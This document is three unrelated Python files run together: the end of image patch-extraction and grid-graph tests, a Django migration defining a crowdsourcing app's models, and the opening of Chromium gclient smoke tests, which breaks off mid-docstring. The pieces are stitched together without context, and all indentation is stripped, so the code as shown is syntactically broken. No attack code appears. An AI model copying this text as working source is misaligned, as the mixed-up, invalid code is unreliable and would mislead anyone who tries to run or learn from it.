A = grid_to_graph(n_x=size, n_y=size, mask=mask, return_as=np.ndarray)
assert_true(connected_components(A)[0] == 2)
# Checking that the function works whatever the type of mask is
mask = np.ones((size, size), dtype=np.int16)
A = grid_to_graph(n_x=size, n_y=size, n_z=size, mask=mask)
assert_true(connected_components(A)[0] == 1)
# Checking dtype of the graph
mask = np.ones((size, size))
A = grid_to_graph(n_x=size, n_y=size, n_z=size, mask=mask, dtype=np.bool)
assert_true(A.dtype == np.bool)
A = grid_to_graph(n_x=size, n_y=size, n_z=size, mask=mask, dtype=np.int)
assert_true(A.dtype == np.int)
A = grid_to_graph(n_x=size, n_y=size, n_z=size, mask=mask, dtype=np.float)
assert_true(A.dtype == np.float)
def test_connect_regions():
lena = sp.misc.lena()
for thr in (50, 150):
mask = lena > thr
graph = img_to_graph(lena, mask)
assert_equal(ndimage.label(mask)[1], connected_components(graph)[0])
def test_connect_regions_with_grid():
lena = sp.misc.lena()
mask = lena > 50
graph = grid_to_graph(*lena.shape, mask=mask)
assert_equal(ndimage.label(mask)[1], connected_components(graph)[0])
mask = lena > 150
graph = grid_to_graph(*lena.shape, mask=mask, dtype=None)
assert_equal(ndimage.label(mask)[1], connected_components(graph)[0])
def _downsampled_lena():
lena = sp.misc.lena().astype(np.float32)
lena = (lena[::2, ::2] + lena[1::2, ::2] + lena[::2, 1::2]
+ lena[1::2, 1::2])
lena = (lena[::2, ::2] + lena[1::2, ::2] + lena[::2, 1::2]
+ lena[1::2, 1::2])
lena = lena.astype(np.float)
lena /= 16.0
return lena
def _orange_lena(lena=None):
lena = _downsampled_lena() if lena is None else lena
lena_color = np.zeros(lena.shape + (3,))
lena_color[:, :, 0] = 256 - lena
lena_color[:, :, 1] = 256 - lena / 2
lena_color[:, :, 2] = 256 - lena / 4
return lena_color
def _make_images(lena=None):
lena = _downsampled_lena() if lena is None else lena
# make a collection of lenas
images = np.zeros((3,) + lena.shape)
images[0] = lena
images[1] = lena + 1
images[2] = lena + 2
return images
downsampled_lena = _downsampled_lena()
orange_lena = _orange_lena(downsampled_lena)
lena_collection = _make_images(downsampled_lena)
def test_extract_patches_all():
lena = downsampled_lena
i_h, i_w = lena.shape
p_h, p_w = 16, 16
expected_n_patches = (i_h - p_h + 1) * (i_w - p_w + 1)
patches = extract_patches_2d(lena, (p_h, p_w))
assert_equal(patches.shape, (expected_n_patches, p_h, p_w))
def test_extract_patches_all_color():
lena = orange_lena
i_h, i_w = lena.shape[:2]
p_h, p_w = 16, 16
expected_n_patches = (i_h - p_h + 1) * (i_w - p_w + 1)
patches = extract_patches_2d(lena, (p_h, p_w))
assert_equal(patches.shape, (expected_n_patches, p_h, p_w, 3))
def test_extract_patches_all_rect():
lena = downsampled_lena
lena = lena[:, 32:97]
i_h, i_w = lena.shape
p_h, p_w = 16, 12
expected_n_patches = (i_h - p_h + 1) * (i_w - p_w + 1)
patches = extract_patches_2d(lena, (p_h, p_w))
assert_equal(patches.shape, (expected_n_patches, p_h, p_w))
def test_extract_patches_max_patches():
lena = downsampled_lena
i_h, i_w = lena.shape
p_h, p_w = 16, 16
patches = extract_patches_2d(lena, (p_h, p_w), max_patches=100)
assert_equal(patches.shape, (100, p_h, p_w))
expected_n_patches = int(0.5 * (i_h - p_h + 1) * (i_w - p_w + 1))
patches = extract_patches_2d(lena, (p_h, p_w), max_patches=0.5)
assert_equal(patches.shape, (expected_n_patches, p_h, p_w))
assert_raises(ValueError, extract_patches_2d, lena, (p_h, p_w),
max_patches=2.0)
assert_raises(ValueError, extract_patches_2d, lena, (p_h, p_w),
max_patches=-1.0)
def test_reconstruct_patches_perfect():
lena = downsampled_lena
p_h, p_w = 16, 16
patches = extract_patches_2d(lena, (p_h, p_w))
lena_reconstructed = reconstruct_from_patches_2d(patches, lena.shape)
np.testing.assert_array_equal(lena, lena_reconstructed)
def test_reconstruct_patches_perfect_color():
lena = orange_lena
p_h, p_w = 16, 16
patches = extract_patches_2d(lena, (p_h, p_w))
lena_reconstructed = reconstruct_from_patches_2d(patches, lena.shape)
np.testing.assert_array_equal(lena, lena_reconstructed)
def test_patch_extractor_fit():
lenas = lena_collection
extr = PatchExtractor(patch_size=(8, 8), max_patches=100, random_state=0)
assert_true(extr == extr.fit(lenas))
def test_patch_extractor_max_patches():
lenas = lena_collection
i_h, i_w = lenas.shape[1:3]
p_h, p_w = 8, 8
max_patches = 100
expected_n_patches = len(lenas) * max_patches
extr = PatchExtractor(patch_size=(p_h, p_w), max_patches=max_patches,
random_state=0)
patches = extr.transform(lenas)
assert_true(patches.shape == (expected_n_patches, p_h, p_w))
max_patches = 0.5
expected_n_patches = len(lenas) * int((i_h - p_h + 1) * (i_w - p_w + 1)
* max_patches)
extr = PatchExtractor(patch_size=(p_h, p_w), max_patches=max_patches,
random_state=0)
patches = extr.transform(lenas)
assert_true(patches.shape == (expected_n_patches, p_h, p_w))
def test_patch_extractor_max_patches_default():
lenas = lena_collection
extr = PatchExtractor(max_patches=100, random_state=0)
patches = extr.transform(lenas)
assert_equal(patches.shape, (len(lenas) * 100, 12, 12))
def test_patch_extractor_all_patches():
lenas = lena_collection
i_h, i_w = lenas.shape[1:3]
p_h, p_w = 8, 8
expected_n_patches = len(lenas) * (i_h - p_h + 1) * (i_w - p_w + 1)
extr = PatchExtractor(patch_size=(p_h, p_w), random_state=0)
patches = extr.transform(lenas)
assert_true(patches.shape == (expected_n_patches, p_h, p_w))
def test_patch_extractor_color():
lenas = _make_images(orange_lena)
i_h, i_w = lenas.shape[1:3]
p_h, p_w = 8, 8
expected_n_patches = len(lenas) * (i_h - p_h + 1) * (i_w - p_w + 1)
extr = PatchExtractor(patch_size=(p_h, p_w), random_state=0)
patches = extr.transform(lenas)
assert_true(patches.shape == (expected_n_patches, p_h, p_w, 3))
def test_extract_patches_strided():
image_shapes_1D = [(10,), (10,), (11,), (10,)]
patch_sizes_1D = [(1,), (2,), (3,), (8,)]
patch_steps_1D = [(1,), (1,), (4,), (2,)]
expected_views_1D = [(10,), (9,), (3,), (2,)]
last_patch_1D = [(10,), (8,), (8,), (2,)]
image_shapes_2D = [(10, 20), (10, 20), (10, 20), (11, 20)]
patch_sizes_2D = [(2, 2), (10, 10), (10, 11), (6, 6)]
patch_steps_2D = [(5, 5), (3, 10), (3, 4), (4, 2)]
expected_views_2D = [(2, 4), (1, 2), (1, 3), (2, 8)]
last_patch_2D = [(5, 15), (0, 10), (0, 8), (4, 14)]
image_shapes_3D = [(5, 4, 3), (3, 3, 3), (7, 8, 9), (7, 8, 9)]
patch_sizes_3D = [(2, 2, 3), (2, 2, 2), (1, 7, 3), (1, 3, 3)]
patch_steps_3D = [(1, 2, 10), (1, 1, 1), (2, 1, 3), (3, 3, 4)]
expected_views_3D = [(4, 2, 1), (2, 2, 2), (4, 2, 3), (3, 2, 2)]
last_patch_3D = [(3, 2, 0), (1, 1, 1), (6, 1, 6), (6, 3, 4)]
image_shapes = image_shapes_1D + image_shapes_2D + image_shapes_3D
patch_sizes = patch_sizes_1D + patch_sizes_2D + patch_sizes_3D
patch_steps = patch_steps_1D + patch_steps_2D + patch_steps_3D
expected_views = expected_views_1D + expected_views_2D + expected_views_3D
last_patches = last_patch_1D + last_patch_2D + last_patch_3D
for (image_shape, patch_size, patch_step, expected_view,
last_patch) in zip(image_shapes, patch_sizes, patch_steps,
expected_views, last_patches):
image = np.arange(np.prod(image_shape)).reshape(image_shape)
patches = extract_patches(image, patch_shape=patch_size,
extraction_step=patch_step)
ndim = len(image_shape)
assert_true(patches.shape[:ndim] == expected_view)
last_patch_slices = [slice(i, i + j, None) for i, j in
zip(last_patch, patch_size)]
assert_true((patches[[slice(-1, None, None)] * ndim] ==
image[last_patch_slices].squeeze()).all())
def test_extract_patches_square():
# test same patch size for all dimensions
lena = downsampled_lena
i_h, i_w = lena.shape
p = 8
expected_n_patches = ((i_h - p + 1), (i_w - p + 1))
patches = extract_patches(lena, patch_shape=p)
assert_true(patches.shape == (expected_n_patches[0], expected_n_patches[1],
p, p))
def test_width_patch():
# width and height of the patch should be less than the image
x = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
assert_raises(ValueError, extract_patches_2d, x, (4, 1))
assert_raises(ValueError, extract_patches_2d, x, (1, 4))
if __name__ == '__main__':
import nose
nose.runmodule()
|
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
import oauth2client.django_orm
class Migration(migrations.Migration):
dependencies = [
('auth', '0006_require_contenttypes_0002'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='AccountModel',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=128)),
('type', models.CharField(max_length=16)),
('email', models.EmailField(max_length=254)),
('access_token', models.TextField(max_length=2048)),
('root', models.CharField(max_length=256)),
('is_active', models.IntegerField()),
('quota', models.BigIntegerField()),
('used_space', models.BigIntegerField()),
('assigned_space', models.BigIntegerField()),
('status', models.IntegerField(default=models.BigIntegerField())),
],
),
migrations.CreateModel(
name='ActivityLog',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('activity', models.CharField(max_length=512)),
('created_timestamp', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Address',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('street', models.CharField(max_length=128, error_messages={b'required': b'Please specify the street name!'})),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=128, error_messages={b'required': b'Please enter the category name!'})),
('deleted', models.BooleanField(default=False)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('parent', models.ForeignKey(to='crowdsourcing.Category', null=True)),
],
),
migrations.CreateModel(
name='City',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=64, error_messages={b'required': b'Please specify the city!'})),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Country',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=64, error_messages={b'required': b'Please specify the country!'})),
('code', models.CharField(max_length=8, error_messages={b'required': b'Please specify the country code!'})),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='CredentialsModel',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('credential', oauth2client.django_orm.CredentialsField(null=True)),
('account', models.ForeignKey(to='crowdsourcing.AccountModel')),
],
),
migrations.CreateModel(
name='Currency',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=32)),
('iso_code', models.CharField(max_length=8)),
('last_updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='FlowModel',
fields=[
('id', models.OneToOneField(primary_key=True, serialize=False, to=settings.AUTH_USER_MODEL)),
('flow', oauth2client.django_orm.FlowField(null=True)),
],
),
migrations.CreateModel(
name='Friendship',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('deleted', models.BooleanField(default=False)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Language',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=64, error_messages={b'required': b'Please specify the language!'})),
('iso_code', models.CharField(max_length=8)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Module',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=128, error_messages={b'required': b'Please enter the module name!'})),
('description', models.TextField(error_messages={b'required': b'Please enter the module description!'})),
('keywords', models.TextField()),
('status', models.IntegerField(default=1, choices=[(1, b'Created'), (2, b'In Review'), (3, b'In Progress'), (4, b'Finished')])),
('repetition', models.IntegerField()),
('module_timeout', models.IntegerField()),
('deleted', models.BooleanField(default=False)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='ModuleCategory',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('category', models.ForeignKey(to='crowdsourcing.Category')),
('module', models.ForeignKey(to='crowdsourcing.Module')),
],
),
migrations.CreateModel(
name='ModuleRating',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('value', models.IntegerField()),
('last_updated', models.DateTimeField(auto_now=True)),
('module', models.ForeignKey(to='crowdsourcing.Module')),
],
),
migrations.CreateModel(
name='ModuleReview',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('annonymous', models.BooleanField(default=False)),
('comments', models.TextField()),
('last_updated', models.DateTimeField(auto_now=True)),
('module', models.ForeignKey(to='crowdsourcing.Module')),
],
),
migrations.CreateModel(
name='PasswordResetModel',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('reset_key', models.CharField(max_length=40)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=128, error_messages={b'required': b'Please enter the project name!'})),
('start_date', models.DateTimeField(auto_now_add=True)),
('end_date', models.DateTimeField(auto_now_add=True)),
('description', models.CharField(default=b'', max_length=1024)),
('keywords', models.TextField()),
('deleted', models.BooleanField(default=False)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='ProjectCategory',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('category', models.ForeignKey(to='crowdsourcing.Category')),
('project', models.ForeignKey(to='crowdsourcing.Project')),
],
),
migrations.CreateModel(
name='ProjectRequester',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('project', models.ForeignKey(to='crowdsourcing.Project')),
],
),
migrations.CreateModel(
name='Qualification',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('type', models.IntegerField(default=1, choices=[(1, b'Strict'), (2, b'Flexible')])),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('module', models.ForeignKey(to='crowdsourcing.Module')),
],
),
migrations.CreateModel(
name='QualificationItem',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('attribute', models.CharField(max_length=128)),
('operator', models.CharField(max_length=128)),
('value1', models.CharField(max_length=128)),
('value2', models.CharField(max_length=128)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('qualification', models.ForeignKey(to='crowdsourcing.Qualification')),
],
),
migrations.CreateModel(
name='Region',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=64, error_messages={b'required': b'Please specify the region!'})),
('code', models.CharField(max_length=16, error_messages={b'required': b'Please specify the region code!'})),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='RegistrationModel',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('activation_key', models.CharField(max_length=40)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='Requester',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
),
migrations.CreateModel(
name='RequesterRanking',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('requester_name', models.CharField(max_length=128)),
('requester_payRank', models.FloatField()),
('requester_fairRank', models.FloatField()),
('requester_speedRank', models.FloatField()),
('requester_communicationRank', models.FloatField()),
('requester_numberofReviews', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Role',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(unique=True, max_length=32, error_messages={b'unique': b'The role %(value)r already exists. Please provide another name!', b'required': b'Please specify the role name!'})),
('is_active', models.BooleanField(default=True)),
('deleted', models.BooleanField(default=False)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Skill',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=128, error_messages={b'required': b'Please enter the skill name!'})),
('description', models.CharField(max_length=512, error_messages={b'required': b'Please enter the skill description!'})),
('verified', models.BooleanField(default=False)),
('deleted', models.BooleanField(default=False)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('parent', models.ForeignKey(to='crowdsourcing.Skill', null=True)),
],
),
migrations.CreateModel(
name='Task',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('status', models.IntegerField(default=1, choices=[(1, b'Created'), (2, b'Accepted'), (3, b'Assigned'), (4, b'Finished')])),
('deleted', models.BooleanField(default=False)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('price', models.FloatField(default=0)),
('module', models.ForeignKey(to='crowdsourcing.Module')),
],
),
migrations.CreateModel(
name='TaskWorker',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('task', models.ForeignKey(to='crowdsourcing.Task')),
],
),
migrations.CreateModel(
name='TaskWorkerResult',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('result', models.TextField()),
('status', models.IntegerField(default=1, choices=[(1, b'Created'), (2, b'Accepted'), (3, b'Rejected')])),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('task_worker', models.ForeignKey(to='crowdsourcing.TaskWorker')),
],
),
migrations.CreateModel(
name='Template',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=128, error_messages={b'required': b'Please enter the template name!'})),
('source_html', models.TextField()),
('deleted', models.BooleanField(default=False)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('owner', models.ForeignKey(to='crowdsourcing.Requester')),
],
),
migrations.CreateModel(
name='TemplateItem',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=128, error_messages={b'required': b'Please enter the name of the template item!'})),
('deleted', models.BooleanField(default=False)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('template', models.ForeignKey(to='crowdsourcing.Template')),
],
),
migrations.CreateModel(
name='TemplateItemProperties',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('attribute', models.CharField(max_length=128)),
('operator', models.CharField(max_length=128)),
('value1', models.CharField(max_length=128)),
('value2', models.CharField(max_length=128)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('template_item', models.ForeignKey(to='crowdsourcing.TemplateItem')),
],
),
migrations.CreateModel(
name='TemporaryFlowModel',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('type', models.CharField(max_length=16)),
('email', models.EmailField(max_length=254)),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='UserCountry',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('country', models.ForeignKey(to='crowdsourcing.Country')),
],
),
migrations.CreateModel(
name='UserLanguage',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('language', models.ForeignKey(to='crowdsourcing.Language')),
],
),
migrations.CreateModel(
name='UserPreferences',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('login_alerts', models.SmallIntegerField(default=0)),
('last_updated', models.DateTimeField(auto_now=True)),
('currency', models.ForeignKey(to='crowdsourcing.Currency')),
('language', models.ForeignKey(to='crowdsourcing.Language')),
('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('gender', models.CharField(max_length=1, choices=[(b'M', b'Male'), (b'F', b'Female')])),
('birthday', models.DateField(null=True, error_messages={b'invalid': b'Please enter a correct date format'})),
('verified', models.BooleanField(default=False)),
('picture', models.BinaryField(null=True)),
('deleted', models.BooleanField(default=False)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('worker_alias', models.CharField(max_length=32, error_messages={b'required': b'Please enter an alias!'})),
('requester_alias', models.CharField(max_length=32, error_messages={b'required': b'Please enter an alias!'})),
('address', models.ForeignKey(to='crowdsourcing.Address', null=True)),
('friends', models.ManyToManyField(to='crowdsourcing.UserProfile', through='crowdsourcing.Friendship')),
('languages', models.ManyToManyField(to='crowdsourcing.Language', through='crowdsourcing.UserLanguage')),
('nationality', models.ManyToManyField(to='crowdsourcing.Country', through='crowdsourcing.UserCountry')),
],
),
migrations.CreateModel(
name='UserRole',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('role', models.ForeignKey(to='crowdsourcing.Role')),
('user_profile', models.ForeignKey(to='crowdsourcing.UserProfile')),
],
),
migrations.CreateModel(
name='Worker',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('deleted', models.BooleanField(default=False)),
('profile', models.OneToOneField(to='crowdsourcing.UserProfile')),
],
),
migrations.CreateModel(
name='WorkerModuleApplication',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('status', models.IntegerField(default=1, choices=[(1, b'Created'), (2, b'Accepted'), (3, b'Rejected')])),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('module', models.ForeignKey(to='crowdsourcing.Module')),
('worker', models.ForeignKey(to='crowdsourcing.Worker')),
],
),
migrations.CreateModel(
name='WorkerSkill',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('level', models.IntegerField(null=True)),
('verified', models.BooleanField(default=False)),
('created_timestamp', models.DateTimeField(auto_now_add=True)),
('last_updated', models.DateTimeField(auto_now=True)),
('skill', models.ForeignKey(to='crowdsourcing.Skill')),
('worker', models.ForeignKey(to='crowdsourcing.Worker')),
],
),
migrations.AddField(
model_name='worker',
name='skills',
field=models.ManyToManyField(to='crowdsourcing.Skill', through='crowdsourcing.WorkerSkill'),
),
migrations.AddField(
model_name='userprofile',
name='roles',
field=models.ManyToManyField(to='crowdsourcing.Role', through='crowdsourcing.UserRole'),
),
migrations.AddField(
model_name='userprofile',
name='user',
field=models.OneToOneField(to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='userlanguage',
name='user',
field=models.ForeignKey(to='crowdsourcing.UserProfile'),
),
migrations.AddField(
model_name='usercountry',
name='user',
field=models.ForeignKey(to='crowdsourcing.UserProfile'),
),
migrations.AddField(
model_name='taskworkerresult',
name='template_item',
field=models.ForeignKey(to='crowdsourcing.TemplateItem'),
),
migrations.AddField(
model_name='taskworker',
name='worker',
field=models.ForeignKey(to='crowdsourcing.Worker'),
),
migrations.AddField(
model_name='requester',
name='profile',
field=models.OneToOneField(to='crowdsourcing.UserProfile'),
),
migrations.AddField(
model_name='projectrequester',
name='requester',
field=models.ForeignKey(to='crowdsourcing.Requester'),
),
migrations.AddField(
model_name='project',
name='categories',
field=models.ManyToManyField(to='crowdsourcing.Category', through='crowdsourcing.ProjectCategory'),
),
migrations.AddField(
model_name='project',
name='collaborators',
field=models.ManyToManyField(to='crowdsourcing.Requester', through='crowdsourcing.ProjectRequester'),
),
migrations.AddField(
model_name='project',
name='owner',
field=models.ForeignKey(related_name='project_owner', to='crowdsourcing.Requester'),
),
migrations.AddField(
model_name='modulereview',
name='worker',
field=models.ForeignKey(to='crowdsourcing.Worker'),
),
migrations.AddField(
model_name='modulerating',
name='worker',
field=models.ForeignKey(to='crowdsourcing.Worker'),
),
migrations.AddField(
model_name='module',
name='categories',
field=models.ManyToManyField(to='crowdsourcing.Category', through='crowdsourcing.ModuleCategory'),
),
migrations.AddField(
model_name='module',
name='owner',
field=models.ForeignKey(to='crowdsourcing.Requester'),
),
migrations.AddField(
model_name='module',
name='project',
field=models.ForeignKey(to='crowdsourcing.Project'),
),
migrations.AddField(
model_name='friendship',
name='user_source',
field=models.ForeignKey(related_name='user_source', to='crowdsourcing.UserProfile'),
),
migrations.AddField(
model_name='friendship',
name='user_target',
field=models.ForeignKey(related_name='user_target', to='crowdsourcing.UserProfile'),
),
migrations.AddField(
model_name='country',
name='region',
field=models.ForeignKey(to='crowdsourcing.Region'),
),
migrations.AddField(
model_name='city',
name='country',
field=models.ForeignKey(to='crowdsourcing.Country'),
),
migrations.AddField(
model_name='address',
name='city',
field=models.ForeignKey(to='crowdsourcing.City'),
),
migrations.AddField(
model_name='address',
name='country',
field=models.ForeignKey(to='crowdsourcing.Country'),
),
migrations.AddField(
model_name='activitylog',
name='author',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='accountmodel',
name='owner',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
),
migrations.AlterUniqueTogether(
name='projectcategory',
unique_together=set([('project', 'category')]),
),
migrations.AlterUniqueTogether(
name='modulereview',
unique_together=set([('worker', 'module')]),
),
migrations.AlterUniqueTogether(
name='modulerating',
unique_together=set([('worker', 'module')]),
),
migrations.AlterUniqueTogether(
name='modulecategory',
unique_together=set([('category', 'module')]),
),
]
|
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Smoke tests for gclient.py.
Shell out 'gclient' and run basic conformance tests.
This test assumes GClientSmokeBase.URL_BASE is valid.
"""
import logging
import os
import re
import subprocess
import sys
import unittest
ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, ROOT_DIR)
import gclient_utils
import scm as gclient_scm
import subprocess2
from testing_support import fake_repos
from testing_support.fake_repos import join, write
GCLIENT_PATH = os.path.join(ROOT_DIR, 'gclient')
COVERAGE = False
class GClientSmokeBase(fake_repos.FakeReposTestBase):
def setUp(self):
super(GClientSmokeBase, self).setUp()
# Make sure it doesn't try to auto update when testing!
self.env = os.environ.copy()
self.env['DEPOT_TOOLS_UPDATE'] = '0'
def gclient(self, cmd, cwd=None):
if not cwd:
cwd = self.root_dir
if COVERAGE:
# Don't use the wrapper script.
cmd_base = ['coverage', 'run', '-a', GCLIENT_PATH + '.py']
else:
cmd_base = [GCLIENT_PATH]
cmd = cmd_base + cmd
process = subprocess.Popen(cmd, cwd=cwd, env=self.env,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=sys.platform.startswith('win'))
(stdout, stderr) = process.communicate()
logging.debug("XXX: %s\n%s\nXXX" % (' '.join(cmd), stdout))
logging.debug("YYY: %s\n%s\nYYY" % (' '.join(cmd), stderr))
# pylint: disable=E1103
return (stdout.replace('\r\n', '\n'), stderr.replace('\r\n', '\n'),
process.returncode)
def untangle(self, stdout):
tasks = {}
remaining = []
for line in stdout.splitlines(False):
m = re.match(r'^(\d)+>(.*)$', line)
if not m:
remaining.append(line)
else:
self.assertEquals([], remaining)
tasks.setdefault(int(m.group(1)), []).append(m.group(2))
out = []
for key in sorted(tasks.iterkeys()):
out.extend(tasks[key])
out.extend(remaining)
return '\n'.join(out)
def parseGclient(self, cmd, items, expected_stderr='', untangle=False):
"""Parse gclient's output to make it easier to test.
